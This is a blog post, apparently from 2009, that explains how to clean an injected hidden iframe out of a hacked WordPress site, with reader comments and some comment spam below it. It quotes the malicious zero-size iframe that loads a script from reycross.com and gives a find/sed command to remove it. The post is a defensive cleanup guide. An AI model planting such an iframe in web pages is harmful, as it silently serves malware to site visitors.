How to Remove reycross.com WordPress Malware

It seems that a new WordPress malware hijack is making the rounds and we got hit. Google just issued me a “this site contains malware” warning for my sites, after some quick investigation it looks like the hijack has attached a malicious <iframe> block to the end of every HTML and PHP page in the site, so now I need to clean it out.

Luckily this is just like last time, and was easy to get rid of. I hope this tip helps someone else out as well.

This time, the iframe snippet that was getting added was:

<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Luckily, I had my old script laying around that systematically searches through all my files and removed the offending piece of crap from the files, you can use this script command as well to do the same:

find . -name '*.*' -exec sed -i 's/<iframe src="http:\/\/reycross.com\/laso\/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;

Hope this helps anybody else getting sacked by this attack. I think it has to do with a theme vulnerability :(

Tags: , , , ,

About Riyad Kalla

Software development, video games, writing, reading and anything shiny. I ultimately just want to provide a resource that helps people and if I can't do that, then at least make them laugh.

, , , ,

10 Responses to “How to Remove reycross.com WordPress Malware”

  1. Codrut Turcanu December 21, 2009 at 1:04 pm #

    Hey, I’m having similar problems… my RSS feed link got infected too

    Any idea how to remove that too?

    Also where and how do I include this text? [I'm not a tech guy]

    find . -name ‘*.*’ -exec sed -i ‘s///g’ {} \;

    Thank you

    • Riyad Kalla December 27, 2009 at 3:31 pm #

      Codrut,

      I’m not sure which part of WordPress generates the RSS feed content, so I’m not sure where to look to clear that out — but you execute that line of code I provided from a Unix/Linux command line from the root directory of where your wordpress install lives — it will scan *every* file looking for the pattern of the injected infected content and replace it with nothing — effectively removing it.

      It should clean it out from wherever the RSS infection is taking place as well.

  2. Jonathan Soroko December 27, 2009 at 7:00 am #

    We seem to have been hit earlier – we discovered it in older posts only. And that accidentally by looking for an old post.
    But this is helpful – seeing another variation on the problem.
    JS

    • Riyad Kalla December 27, 2009 at 3:33 pm #

      Jonathan I hope you guys got everything cleaned out OK? If you run the command given anyway, it’s more or less a no-op if there are no matching hacked scripts so it’s relatively harmless if you just wanted to run it to be safe. But if you already got things cleaned up then you should be OK.

  3. Larry Furman December 28, 2009 at 10:56 am #

    Find and sed are unix linux tools. Have you tested this in a terminal wind on Mac OSX? What about windows?

  4. Larry Furman December 28, 2009 at 10:56 am #

    Find and sed are unix / linux tools. Have you tested this in a terminal wind on Mac OSX? What about MS Windows?

  5. pokerstrategрWc March 10, 2011 at 2:11 pm #

    Unknown message

  6. <a href="http://www.zzlocal.com/">Pennsylvania Classified Ads November 11, 2012 at 11:53 pm #

    I’m sure this would help guests extremely. Will save your website for more updates! Thank’s

  7. Pennsylvania Classified Ads November 11, 2012 at 11:56 pm #

    Hey Admin, Sharing unique information is quite complicated and really you’ve done the complicated job. Thanks for sharing such an amazing information.

Trackbacks/Pingbacks

  1. Malware attacks on WordPress - December 27, 2009

    [...] Riyad Kalla of the blog/website Kallasoft has written one helpful post How to Remove reycross.com WordPress Malware. [...]

Leave a Reply


2 × six =